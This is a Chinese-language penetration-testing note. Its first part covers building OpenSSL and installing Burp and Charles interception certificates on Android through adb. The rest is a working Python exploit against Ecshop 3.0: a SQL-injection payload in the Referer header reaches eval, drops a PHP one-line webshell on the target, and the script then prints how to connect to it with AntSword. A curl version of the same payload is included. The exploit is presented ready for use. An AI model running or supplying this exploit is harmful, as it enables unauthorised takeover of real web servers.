证书及木马生成

手机端配置证书

openssl 官网：https://www.openssl.org/source/

编译工具：

https://visualstudio.microsoft.com/zh-hans/visual-cpp-build-tools/

https://strawberryperl.com/

使用Native Tools Command 编辑（VisualStudio）

#64位计算机采用：
perl Configure VC-WIN64A --prefix=F:\your\install\path
nmake
nmake install

验证安装：

openssl.exe -v

一： burp证书 （https://blog.csdn.net/qq_40731934/article/details/124830493）

http://burp 手机下载后 adb pull 导出

将导出的证书 转化为pem证书

openssl x509 -inform der -in burp.cer -out burp.pem

查看证书hash 值 并重名名 证书

openssl x509 -subject_hash_old -in burp.pem
burp.pem改名为9a5ba575.0

再将证书导入

adb push 9a5ba575/system/etc/security/cacerts/

导入证书问题

权限：

adb remount  // 若提示错误 adb disable-verity
adb reboot
adb root
adb remount
#再导入

二 ：charles 证书 同理（https://blog.csdn.net/qq_24298751/article/details/126859135）

一句话木马生成脚本：

import base64
import requests
import argparse
"""
exp curl：
curl http://www.o.com/user.php \
-d "action=login&vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOycpOw));exit;" \
-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
"""
class MakeExp:
    def __init__(self, url, name, passwd):
        '''
        author: sss
        :param url:  目标域名或者ip
        :param name: 连接的账号名称
        :param passwd: 连接密码
        '''
        self.headers = {
            "Referer": "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\"num\";s:207:\"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--\";s:2:\"id\";s:9:\"' union/*\";s:4:\"name\";s:3:\"ads\";}45ea207d7a2b68c49582d2d22adf953a"
        }
        self.url = f'{url}/user.php'
        self.name = name
        self.passwd = passwd
    def run(self):
        # 将字符串转换为字节
        text=f"file_put_contents('{self.name}.php','<?php eval($_REQUEST[{self.passwd}]);');"
        text_bytes = text.encode('utf-8')
        # Base64 编码
        encoded_bytes = base64.b64encode(text_bytes)
        # 将编码后的字节转换为字符串
        encoded_str = encoded_bytes.decode('utf-8').strip('=')
        try:
            data = {
                "action": "login",
                "vulnspy": f"eval/**/(base64_decode({encoded_str}));exit;"
            }
            response = requests.post(self.url, headers=self.headers, data=data)
            if "{$" in response.text:
                print('###########################################################')
                print("恭喜大佬，exp注入成功!!!\n响应:")
                print(response.text)
                print('###########################################################')
                print(f'蚁剑里输入:{self.url.split("/user.php")[0]}/{self.name}.php\n密码：{self.passwd}\n开干了兄弟们~PHP是世界上最好的语言')
                print('###########################################################')
                print('蚁剑下载地址：https://github.com/AntSwordProject/antSword')
                print('蚁剑加载器下载地址：https://github.com/AntSwordProject/AntSword-Loader')
                print('###########################################################')
        except Exception as e:
            print(e)
def main():
    parser = argparse.ArgumentParser(description="Ecshop 3.0版本 ,生成exp脚本")
    parser.add_argument('-u', '--url', type=str, required=True, help='目标 URL或者ip ,ep:http://ip')
    parser.add_argument('-n', '--name', type=str, required=True, help='连接账号名')
    parser.add_argument('-p', '--passwd', type=str, required=True, help='连接密码')
    args = parser.parse_args()
    exp = MakeExp(args.url, args.name, args.passwd)
    exp.run()
if __name__ == '__main__':
    main()